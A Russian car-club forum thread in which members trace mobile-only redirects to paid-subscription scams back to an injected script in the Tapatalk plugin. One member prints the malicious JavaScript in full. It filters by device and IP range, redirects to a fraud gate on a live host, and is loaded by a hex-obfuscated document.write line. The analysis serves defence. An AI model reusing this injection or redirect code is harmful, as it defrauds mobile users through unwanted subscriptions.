Глюк или вирус?

[dok]

Когда я в командировках захожу на сайт с тел время от времени при первом входе перенаправляет на какойто сайт. Антивирус его блокирует. Сбрасываю захожу снова нормально. Полная проверка антивирусом результатов не дает.

Тел. Андроид. Антивирус ДрВеб

Так происходит только на карсе

[Strange]

сегодня в маршрутке минут 40 лазал по карсу

с Теле2

ни разу ниче не выскочило

[Scarabey]

В этом весь изюм))

Неа, выше посмотри, там и Андрюшка заразился.

[Aland]

Позавчера чудесным образом стал обладателем подписки что-то вроде смОтри. Ру

За 30 рублей в сутки.

Пришло сообщение о подписке. Меня это очень удивило - позвонил в мегафон. Они не признавались в своей вине. Подписку отключили.

Смотрел только Карс. Иос, сафари

[Strange]

       

непробиваемая иос

[Aland]

Мне кажецца дело не в Оси и браузере.

[Kent]

Дроид, который жрёт батарею + хром который ворует абсолютно всё. Глюков не заметил.

Ну... разве что Grax вчера вечером слайдов накидал...

[Homer]

       

непробиваемая иос

Говорят по айфонам летают самые продвинутые летчики, ассы

[Aland]

Господа. Будьте проще) не уподобляйтесь.

[Design_Nick]

Завтра отключу tapatalk. Посмотрим

[Flxl]

Купил новый телефон. Хотел зайти на карс, сразу выскочила эта херня с подпиской.

Т.е. даже не авторизован был и с главной страницы такое

[yellow_rabbit]

зачем то потратил время.
чего нашел
какой то раздел вызывает скрипт по адресу

http://psnmail.me/jquery8.js

причем вызывается на напрямую, а через редирект (от сайта https://goo.gl/44qqIe)

который, в свою очередь идет из скрипта appbanner.js

который - является частью от тапатолка.
по этому адресу идет текст

 

 

f(!getCookie("uid"))
{
    var gate = "http://anyafabbris.fvds.ru/red8.php";
    var today = new Date(), tomorrow = new Date();
    tomorrow["setDate"](today["getDate"]() 4);
    setCookie("uid", 1, tomorrow["toGMTString"]());
    var ua = navigator["userAgent"]["toLowerCase"]();
    if (ua["indexOf"]("android") > -1 || ua["indexOf"]("iphone") > - 1) {
        if (ip_in_range() == "yes") {
            window["location"] = gate;
        }
    }
};
function ip_in_range()
{
    if (window["XMLHttpRequest"]) {
        xmlhttp = new XMLHttpRequest()
    }
    else {
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    };
    xmlhttp["open"]("GET", "http://anyafabbris.fvds.ru/server.php", false);
    xmlhttp["send"]();
    return xmlhttp["responseText"]
}
function setCookie(_0xa3e7x6, _0xa3e7x7, _0xa3e7x8, _0xa3e7x9, _0xa3e7xa, _0xa3e7xb)
{
    document["cookie"] = _0xa3e7x6 "=" escape(_0xa3e7x7) ((_0xa3e7x8) ? "; expires=" _0xa3e7x8 : "") ((_0xa3e7x9) ? "; path=" _0xa3e7x9 : "") ((_0xa3e7xa) ? "; domain=" _0xa3e7xa : "") ((_0xa3e7xb) ? "; secure" : "")
}
function getCookie(_0xa3e7x6)
{
    var _0xa3e7xd = " " document["cookie"];
    var _0xa3e7xe = " " _0xa3e7x6 "=";
    var _0xa3e7xf = null;
    var _0xa3e7x10 = 0;
    var _0xa3e7x11 = 0;
    if (_0xa3e7xd["length"] > 0)
    {
        _0xa3e7x10 = _0xa3e7xd["indexOf"](_0xa3e7xe);
        if (_0xa3e7x10 != - 1)
        {
            _0xa3e7x10 = _0xa3e7xe["length"];
            _0xa3e7x11 = _0xa3e7xd["indexOf"](";", _0xa3e7x10);
            if (_0xa3e7x11 == - 1) {
                _0xa3e7x11 = _0xa3e7xd["length"];
            };
            _0xa3e7xf = unescape(_0xa3e7xd["substring"](_0xa3e7x10, _0xa3e7x11));
        }
    };
    return (_0xa3e7xf)
}
 

 

 

 

адрес, на который ссылается

http://anyafabbris.fvds.ru/red8.php

и ведет на разные редиректы с подписками.

 

причем по коду видно, что срабатывает только на мобильные устройства.

Изменено 27 июня, 2016 пользователем yellow_rabbit

[yellow_rabbit]

исследуем дальше.

уже выяснили кто и откуда вызывает это.

 

смотрим скрипт от тапатолка

 

его вызывает строка

document["\x77\x72\x69\x74\x65"]("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x34\x71\x71\x49\x65\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E")

которая самая нижняя в этом скрипте.

 

можно попробовать удалить эту строку в файле, должно быть щастье.

ну при условии, что этот скрипт не сам обновляется.

ну и вывод.

предположения о тапатолке оказались верными.

[Nazarich]

Сходил по всем ссылкам

Всё ок

А потпись " отправлено с моего тапаталк"

Я видел у Гриши.

Вот вам готовый обвиняемый)))

[Raider]

Сходил по всем ссылкам

Всё ок

там нюанс есть, попробуй походить, отклячив вафлю и в рабочее время.

[Design_Nick]

 

 

предположения о тапатолке оказались верными.

 

Отключил tapatalk. Жду Ваших сообщений.

 

@yellow_rabbit, спасибо за исследование!

[Strange]

я не то чтобы не настоящий сварщик... Я даже электроды только в магазине видел...

но прикольно разделено

 

андроид и айфон

 

 

 

 

if (ua["indexOf"]("android") > -1 || ua["indexOf"]("iphone") > - 1) {

[dok]

Отключил tapatalk. Жду Ваших сообщений.

 

@yellow_rabbit, спасибо за исследование!

Пока тихо

[kolyako]

Сегодня с утра:

[yellow_rabbit]

@kolyako, ну хоть тему скажи куда зашел.

чтобы знать кого с утра расстреливать будем. 

[kolyako]

Предупреждение выпригивает только при входе на форум. У меня (как и у многих) наверно, настроенно сразу на новые сообщения. Несколько дней этой фигни не было.

[dok]

по сегодняшний день проблема не появлялась

[Стасян]

У меня только что выскочила.

До этого, ещё в четверг выскакивала.

[Design_Nick]

Подробнее пожалуйста. Я не экстрасенс.

 

Страница, скрин, оператор, операционная система.

[Стасян]

Подробнее пожалуйста. Я не экстрасенс.

 

Страница, скрин, оператор, операционная система.

Окай.

Устройство: iPhone 5, версия iOS 8.4.1. Браузер стандартный Safari. Оператор: билайн, 3G.

Скрин с четверга вкладываю,

Сегодня не сфоткал не додумался.

 

Дядя Коля, есть подозрение что эта штука выскакивает по времени, а именно после 13:30. . В четверг согласно скриншоту в 13:42, а сегодня это было в 13:46.

В четверг был возобновлен просмотр форума с открытой темы, сегодня в момент появлерия неисправности были открыты "новые сообщения".

[Scarabey]

Хм... Попробовал сейчас.

При входе на главную страницу

 

carsclub.ru iOS Билайн